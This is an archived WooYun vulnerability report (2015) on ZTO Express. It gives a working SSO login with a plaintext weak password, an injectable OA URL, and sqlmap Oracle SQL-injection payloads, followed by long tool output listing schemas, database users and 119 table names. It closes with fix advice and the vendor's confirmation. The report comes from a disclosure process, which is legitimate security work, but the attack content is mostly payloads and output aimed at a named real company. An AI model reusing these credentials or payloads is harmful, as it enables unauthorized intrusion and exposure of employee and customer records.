乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-01: 细节已通知厂商并且等待厂商处理中 2015-11-02: 厂商已经确认,细节仅向厂商公开 2015-11-12: 细节向核心白帽子及相关领域专家公开 2015-11-22: 细节向普通白帽子公开 2015-12-02: 细节向实习白帽子公开 2015-12-17: 细节向公众公开
后台弱口令+SQL注入
https://sso.zt-express.com/
账号:hongwei密码:zto666666
注入点
oa.zt-express.com/OA/InfoCenter/ConsignmentInfo/consignmentselect.aspx?method=&SIGN=0&CONSIGNMENTID=d556338ceafb4afb9889b28f0568244b
Payload: method=&SIGN=0&CONSIGNMENTID=d556338ceafb4afb9889b28f0568244b' AND9874=9874 AND 'XlcM'='XlcM Type: error-based Title: Oracle AND error-based - WHERE or HAVING clause (XMLType) Payload: method=&SIGN=0&CONSIGNMENTID=d556338ceafb4afb9889b28f0568244b' AND2870=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(122)||CHR(107)||CHR(118)||CHR(113)||(SELECT (CASE WHEN (2870=2870) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(118)||CHR(107)||CHR(106)||CHR(113)||CHR(62))) FROM DUAL) AND 'eGnY'='eGnY---[16:44:54] [INFO] the back-end DBMS is Oracleweb server operating system: Windows 2003 or XPweb application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0back-end DBMS: Oracle[16:44:54] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes[16:44:54] [INFO] fetching database (schema) names[16:44:55] [INFO] the SQL query used returns 7 entries[16:44:55] [INFO] retrieved: CTXSYS[16:44:56] [INFO] retrieved: EXFSYS[16:44:56] [INFO] retrieved: MDSYS[16:44:57] [INFO] retrieved: NEWZTOOA[16:44:57] [INFO] retrieved: OLAPSYS[16:44:58] [INFO] retrieved: SYS[16:44:58] [INFO] retrieved: SYSTEMavailable databases [7]:[*] CTXSYS[*] EXFSYS[*] MDSYS[*] NEWZTOOA[*] OLAPSYS[*] SYS[*] SYSTEM
Payload: method=&SIGN=0&CONSIGNMENTID=d556338ceafb4afb9889b28f0568244b' AND9874=9874 AND 'XlcM'='XlcM Type: error-based Title: Oracle AND error-based - WHERE or HAVING clause (XMLType) Payload: method=&SIGN=0&CONSIGNMENTID=d556338ceafb4afb9889b28f0568244b' AND2870=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(122)||CHR(107)||CHR(118)||CHR(113)||(SELECT (CASE WHEN (2870=2870) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(118)||CHR(107)||CHR(106)||CHR(113)||CHR(62))) FROM DUAL) AND 'eGnY'='eGnY---[17:03:44] [INFO] the back-end DBMS is Oracleweb server operating system: Windows 2003 or XPweb application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0back-end DBMS: Oracle[17:03:44] [INFO] fetching database users[17:03:45] [INFO] the SQL query used returns 29 entries[17:03:45] [INFO] retrieved: READONLY[17:03:45] [INFO] retrieved: WEIXIN[17:03:46] [INFO] retrieved: OGG_SYNC[17:03:46] [INFO] retrieved: CRM[17:03:46] [INFO] retrieved: DBMS[17:03:46] [INFO] retrieved: WULIAO[17:03:47] [INFO] retrieved: ZHONGCAI[17:03:47] [INFO] retrieved: NEWZTOOA[17:03:47] [INFO] retrieved: ZTOWEB[17:03:48] [INFO] retrieved: MDDATA[17:03:48] [INFO] retrieved: MDSYS[17:03:48] [INFO] retrieved: SI_INFORMTN_SCHEMA[17:03:49] [INFO] retrieved: ORDPLUGINS[17:03:49] [INFO] retrieved: ORDSYS[17:03:49] [INFO] retrieved: OLAPSYS[17:03:50] [INFO] retrieved: WDOA[17:03:50] [INFO] retrieved: ANONYMOUS[17:03:50] [INFO] retrieved: XDB[17:03:50] [INFO] retrieved: CTXSYS[17:03:51] [INFO] retrieved: EXFSYS[17:03:51] [INFO] retrieved: WMSYS[17:03:51] [INFO] retrieved: ORACLE_OCM[17:03:52] [INFO] retrieved: DBSNMP[17:03:52] [INFO] retrieved: TSMSYS[17:03:52] [INFO] retrieved: DMSYS[17:03:52] [INFO] retrieved: DIP[17:03:53] [INFO] retrieved: OUTLN[17:03:53] [INFO] retrieved: SYSTEM[17:03:53] [INFO] retrieved: SYSdatabase management system users [29]:[*] ANONYMOUS[*] CRM[*] CTXSYS[*] DBMS[*] DBSNMP[*] DIP[*] DMSYS[*] EXFSYS[*] MDDATA[*] MDSYS[*] NEWZTOOA[*] OGG_SYNC[*] OLAPSYS[*] ORACLE_OCM[*] ORDPLUGINS[*] ORDSYS[*] OUTLN[*] READONLY[*] SI_INFORMTN_SCHEMA[*] SYS[*] SYSTEM[*] TSMSYS[*] WDOA[*] WEIXIN[*] WMSYS[*] WULIAO[*] XDB[*] ZHONGCAI[*] ZTOWEB
Payload: method=&SIGN=0&CONSIGNMENTID=d556338ceafb4afb9889b28f0568244b' AND2870=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(122)||CHR(107)||CHR(118)||CHR(113)||(SELECT (CASE WHEN (2870=2870) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(118)||CHR(107)||CHR(106)||CHR(113)||CHR(62))) FROM DUAL) AND 'eGnY'='eGnY---[17:06:46] [INFO] the back-end DBMS is Oracleweb server operating system: Windows 2003 or XPweb application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0back-end DBMS: Oracle[17:06:46] [INFO] fetching tables for database: 'NEWZTOOA'[17:06:46] [INFO] the SQL query used returns 197 entries[17:06:47] [INFO] retrieved: TAB_ZTOA_EMPLOYEE[17:06:47] [INFO] retrieved: TAB_ZTOA_OLDSCANGUN[17:06:48] [INFO] retrieved: TAB_ZTOA_SQLTOCSV[17:06:48] [INFO] retrieved: TAB_ZTOA_USERTEL[17:06:48] [INFO] retrieved: TAB_ZTOA_ZTBEST[17:06:49] [INFO] retrieved: TAB_ZTWEB_BILLSEARCHLOG[17:06:49] [INFO] retrieved: TAB_TAOBAO_RATE[17:06:50] [INFO] retrieved: TAB_ZTOA_COURSEWARE[17:06:50] [INFO] retrieved: TAB_ZTOA_USERSITEIT[17:06:50] [INFO] retrieved: TAB_TAOBAO_COMPLAINT[17:06:51] [INFO] retrieved: TAB_TAOBAO_AREA[17:06:51] [INFO] retrieved: TAB_ZTOA_DIGLOG[17:06:51] [INFO] retrieved: TAB_TAOBAO_GS[17:06:52] [INFO] retrieved: TAB_TAOBAO_SPEED[17:06:52] [INFO] retrieved: TAB_ZTOA_SITEPROVINCE[17:06:53] [INFO] retrieved: TAB_CENTER_RATES[17:06:53] [INFO] retrieved: TAB_ZTOA_PUCHA_BAK[17:06:53] [INFO] retrieved: DR$CONTENT_IDX$I[17:06:54] [INFO] retrieved: DR$CONTENT_IDX$R[17:06:54] [INFO] retrieved: TAB_ZTOA_WORKLOG[17:06:55] [INFO] retrieved: TAB_GUARD_PIC[17:06:55] [INFO] retrieved: TAB_A[17:06:56] [INFO] retrieved: TAB_PROVINCE_TEMP[17:06:56] [INFO] retrieved: TAB_SITE_MONTHCOUNT[17:06:56] [INFO] retrieved: TAB_NO_PAYBQ[17:06:57] [INFO] retrieved: TAB_TEST1[17:06:57] [INFO] retrieved: TAB_ZTOA_AIRPORTCODE[17:06:58] [INFO] retrieved: TAB_ZTOA_AMERCE[17:06:58] [INFO] retrieved: TAB_ZTOA_AMERCETWO[17:06:58] [INFO] retrieved: TAB_ZTOA_ARBITRATION[17:06:59] [INFO] retrieved: TAB_ZTOA_ARBITRATIONAPPEAL[17:06:59] [INFO] retrieved: TAB_ZTOA_ARBITRATIONDISP[17:07:00] [INFO] retrieved: TAB_ZTOA_ARBITRATIONDISPSITE[17:07:00] [INFO] retrieved: TAB_ZTOA_ARBITRATIONMAKEKNOWN[17:07:00] [INFO] retrieved: TAB_ZTOA_ARBITRATIONSITE[17:07:01] [INFO] retrieved: TAB_ZTOA_ARBITRATIONTYPE[17:07:01] [INFO] retrieved: TAB_ZTOA_ASSET_APPLY[17:07:02] [INFO] retrieved: TAB_ZTOA_ASSET_APPLY_TRACK[17:07:02] [INFO] retrieved: TAB_ZTOA_ASSET_DICTIONARY[17:07:02] [INFO] retrieved: TAB_ZTOA_ASSET_NOTES[17:07:03] [INFO] retrieved: TAB_ZTOA_ASSET_VENDOR[17:07:03] [INFO] retrieved: TAB_ZTOA_BREAKBILL[17:07:04] [INFO] retrieved: TAB_ZTOA_BUSLINES[17:07:04] [INFO] retrieved: TAB_ZTOA_BUSNAME[17:07:04] [INFO] retrieved: TAB_ZTOA_CAHIERDATA[17:07:05] [INFO] retrieved: TAB_ZTOA_COMMENTON[17:07:05] [INFO] retrieved: TAB_ZTOA_CONSIGNMENT[17:07:06] [INFO] retrieved: TAB_ZTOA_CONSIGNMENTINFO[17:07:06] [INFO] retrieved: TAB_ZTOA_CUSTOMER[17:07:07] [INFO] retrieved: TAB_ZTOA_DATAINFO[17:07:07] [INFO] retrieved: TAB_ZTOA_DATASORT[17:07:07] [INFO] retrieved: TAB_ZTOA_DISPOSEBOOK[17:07:08] [INFO] retrieved: TAB_ZTOA_DISPOSESITE[17:07:08] [INFO] retrieved: TAB_ZTOA_FINANCE_LIST[17:07:09] [INFO] retrieved: TAB_ZTOA_FINANCE_TYPE[17:07:09] [INFO] retrieved: TAB_ZTOA_FLIGHTS[17:07:09] [INFO] retrieved: TAB_ZTOA_FUNCTIONMODULE[17:07:10] [INFO] retrieved: TAB_ZTOA_GUESTBOOK[17:07:10] [INFO] retrieved: TAB_ZTOA_HRBASICINFO[17:07:11] [INFO] retrieved: TAB_ZTOA_HRDUTY[17:07:11] [INFO] retrieved: TAB_ZTOA_HYPOLINER[17:07:11] [INFO] retrieved: TAB_ZTOA_HYPOLINERDATA[17:07:12] [INFO] retrieved: TAB_ZTOA_ITEQUIPMENT[17:07:12] [INFO] retrieved: TAB_ZTOA_ITREGISTER[17:07:13] [INFO] retrieved: TAB_ZTOA_ITSTORAGE[17:07:13] [INFO] retrieved: TAB_ZTOA_ITWORK[17:07:13] [INFO] retrieved: TAB_ZTOA_K8HELP[17:07:14] [INFO] retrieved: TAB_ZTOA_LEAVEBEHINDDATA[17:07:14] [INFO] retrieved: TAB_ZTOA_LOGINPAGE[17:07:15] [INFO] retrieved: TAB_ZTOA_MAINLINER[17:07:15] [INFO] retrieved: TAB_ZTOA_MAINLINERDATA[17:07:15] [INFO] retrieved: TAB_ZTOA_MOTIF[17:07:16] [INFO] retrieved: TAB_ZTOA_MOTIFCHILD[17:07:16] [INFO] retrieved: TAB_ZTOA_NEWSDEPARTMENT[17:07:17] [INFO] retrieved: TAB_ZTOA_NEWSSORT[17:07:17] [INFO] retrieved: TAB_ZTOA_NOBILL[17:07:17] [INFO] retrieved: TAB_ZTOA_ONDUTY[17:07:18] [INFO] retrieved: TAB_ZTOA_PAISONGFEI[17:07:18] [INFO] retrieved: TAB_ZTOA_PINGIP[17:07:18] [INFO] retrieved: TAB_ZTOA_PINGLIST[17:07:19] [INFO] retrieved: TAB_ZTOA_POSTCODE[17:07:19] [INFO] retrieved: TAB_ZTOA_POST_REPORT[17:07:20] [INFO] retrieved: TAB_ZTOA_PROVINCELINER[17:07:20] [INFO] retrieved: TAB_ZTOA_PROVINCELINERDATA[17:07:20] [INFO] retrieved: TAB_ZTOA_RELATINGPOSTCODE[17:07:21] [INFO] retrieved: TAB_ZTOA_REOPRTSITE[17:07:21] [INFO] retrieved: TAB_ZTOA_REPORTCHILD[17:07:22] [INFO] retrieved: TAB_ZTOA_ROLEFUNCTION[17:07:22] [INFO] retrieved: TAB_ZTOA_ROLES[17:07:22] [INFO] retrieved: TAB_ZTOA_SITEBOOK[17:07:23] [INFO] retrieved: TAB_ZTOA_SITEBOOKBACK[17:07:23] [INFO] retrieved: TAB_ZTOA_SITEMAP[17:07:24] [INFO] retrieved: TAB_ZTOA_SITEVISUALIZE[17:07:24] [INFO] retrieved: TAB_ZTOA_SUFFRAGE[17:07:25] [INFO] retrieved: TAB_ZTOA_TASK[17:07:25] [INFO] retrieved: TAB_ZTOA_TASK_ADDED[17:07:25] [INFO] retrieved: TAB_ZTOA_TASK_FILE[17:07:26] [INFO] retrieved: TAB_ZTOA_TRANSFERFEE[17:07:26] [INFO] retrieved: TAB_ZTOA_USERPHONE[17:07:26] [INFO] retrieved: TAB_ZTOA_USERVALIDATE[17:07:27] [INFO] retrieved: TAB_ZTOA_WEBLOG[17:07:28] [INFO] retrieved: TAB_ZTOA_ZHIFUBAO[17:07:28] [INFO] retrieved: TAB_ZTOOA_IPMANAGE[17:07:28] [INFO] retrieved: TAB_ZTWEB_CITY[17:07:29] [INFO] retrieved: TAB_ZTWEB_EXAMINEE[17:07:29] [INFO] retrieved: TAB_ZTWEB_JOB[17:07:30] [INFO] retrieved: TAB_ZTWEB_PROVINCE[17:07:30] [INFO] retrieved: TAB_ZTWEB_SITE2[17:07:30] [INFO] retrieved: TAB_ZTWEB_SLIDE[17:07:31] [INFO] retrieved: TAB_ADDRESS_DISTRICT[17:07:31] [INFO] retrieved: TAB_ADDRESS_ZIPCODE[17:07:32] [INFO] retrieved: TAB_ZTOA_PUCHA[17:07:32] [INFO] retrieved: TAB_ZTOA_ARBITRATIONSORT[17:07:32] [INFO] retrieved: TAB_ZTOA_YZTJYB[17:07:33] [INFO] retrieved: TAB_ZTOA_YIYUN1[17:07:33] [INFO] retrieved: TAB_ZTOA_YIYUN2[17:07:34] [INFO] retrieved: AA[17:07:34] [INFO] retrieved: TAB_ZTOA_SUPERVISE[17:07:34] [INFO] retrieved: TAB_ZTOA_TASK_USERsqlmap got a 302 redirect to 'http://oa.zt-express.com:80/Login.aspx'. Do you want to follow? [Y/n] nDatabase: NEWZTOOA[119 tables]+-------------------------------+| AA || DR$CONTENT_IDX$I || DR$CONTENT_IDX$R || TAB_A || TAB_ADDRESS_DISTRICT || TAB_ADDRESS_ZIPCODE || TAB_CENTER_RATES || TAB_GUARD_PIC || TAB_NO_PAYBQ || TAB_PROVINCE_TEMP || TAB_SITE_MONTHCOUNT || TAB_TAOBAO_AREA || TAB_TAOBAO_COMPLAINT || TAB_TAOBAO_GS || TAB_TAOBAO_RATE || TAB_TAOBAO_SPEED || TAB_TEST1 || TAB_ZTOA_AIRPORTCODE || TAB_ZTOA_AMERCE || TAB_ZTOA_AMERCETWO || TAB_ZTOA_ARBITRATION || TAB_ZTOA_ARBITRATIONAPPEAL || TAB_ZTOA_ARBITRATIONDISP || TAB_ZTOA_ARBITRATIONDISPSITE || TAB_ZTOA_ARBITRATIONMAKEKNOWN || TAB_ZTOA_ARBITRATIONSITE || TAB_ZTOA_ARBITRATIONSORT || TAB_ZTOA_ARBITRATIONTYPE || TAB_ZTOA_ASSET_APPLY || TAB_ZTOA_ASSET_APPLY_TRACK || TAB_ZTOA_ASSET_DICTIONARY || TAB_ZTOA_ASSET_NOTES || TAB_ZTOA_ASSET_VENDOR || TAB_ZTOA_BREAKBILL || TAB_ZTOA_BUSLINES || TAB_ZTOA_BUSNAME || TAB_ZTOA_CAHIERDATA || TAB_ZTOA_COMMENTON || TAB_ZTOA_CONSIGNMENT || TAB_ZTOA_CONSIGNMENTINFO || TAB_ZTOA_COURSEWARE || TAB_ZTOA_CUSTOMER || TAB_ZTOA_DATAINFO || TAB_ZTOA_DATASORT || TAB_ZTOA_DIGLOG || TAB_ZTOA_DISPOSEBOOK || TAB_ZTOA_DISPOSESITE || TAB_ZTOA_EMPLOYEE || TAB_ZTOA_FINANCE_LIST || TAB_ZTOA_FINANCE_TYPE || TAB_ZTOA_FLIGHTS || TAB_ZTOA_FUNCTIONMODULE || TAB_ZTOA_GUESTBOOK || TAB_ZTOA_HRBASICINFO || TAB_ZTOA_HRDUTY || TAB_ZTOA_HYPOLINER || TAB_ZTOA_HYPOLINERDATA || TAB_ZTOA_ITEQUIPMENT || TAB_ZTOA_ITREGISTER || TAB_ZTOA_ITSTORAGE || TAB_ZTOA_ITWORK || TAB_ZTOA_K8HELP || TAB_ZTOA_LEAVEBEHINDDATA || TAB_ZTOA_LOGINPAGE || TAB_ZTOA_MAINLINER || TAB_ZTOA_MAINLINERDATA || TAB_ZTOA_MOTIF || TAB_ZTOA_MOTIFCHILD || TAB_ZTOA_NEWSDEPARTMENT || TAB_ZTOA_NEWSSORT || TAB_ZTOA_NOBILL || TAB_ZTOA_OLDSCANGUN || TAB_ZTOA_ONDUTY || TAB_ZTOA_PAISONGFEI || TAB_ZTOA_PINGIP || TAB_ZTOA_PINGLIST || TAB_ZTOA_POSTCODE || TAB_ZTOA_POST_REPORT || TAB_ZTOA_PROVINCELINER || TAB_ZTOA_PROVINCELINERDATA || TAB_ZTOA_PUCHA || TAB_ZTOA_PUCHA_BAK || TAB_ZTOA_RELATINGPOSTCODE || TAB_ZTOA_REOPRTSITE || TAB_ZTOA_REPORTCHILD || TAB_ZTOA_ROLEFUNCTION || TAB_ZTOA_ROLES || TAB_ZTOA_SITEBOOK || TAB_ZTOA_SITEBOOKBACK || TAB_ZTOA_SITEMAP || TAB_ZTOA_SITEPROVINCE || TAB_ZTOA_SITEVISUALIZE || TAB_ZTOA_SQLTOCSV || TAB_ZTOA_SUFFRAGE || TAB_ZTOA_SUPERVISE || TAB_ZTOA_TASK || TAB_ZTOA_TASK_ADDED || TAB_ZTOA_TASK_FILE || TAB_ZTOA_TASK_USER || TAB_ZTOA_TRANSFERFEE || TAB_ZTOA_USERPHONE || TAB_ZTOA_USERSITEIT || TAB_ZTOA_USERTEL || TAB_ZTOA_USERVALIDATE || TAB_ZTOA_WEBLOG || TAB_ZTOA_WORKLOG || TAB_ZTOA_YIYUN1 || TAB_ZTOA_YIYUN2 || TAB_ZTOA_YZTJYB || TAB_ZTOA_ZHIFUBAO || TAB_ZTOA_ZTBEST || TAB_ZTOOA_IPMANAGE || TAB_ZTWEB_BILLSEARCHLOG || TAB_ZTWEB_CITY || TAB_ZTWEB_EXAMINEE || TAB_ZTWEB_JOB || TAB_ZTWEB_PROVINCE || TAB_ZTWEB_SITE2 || TAB_ZTWEB_SLIDE |+-------------------------------+
修改密码,过滤sql特殊字符
危害等级:高
漏洞Rank:15
确认时间:2015-11-02 09:29
感谢白帽子的辛苦劳动,开发已经在开始修复。
暂无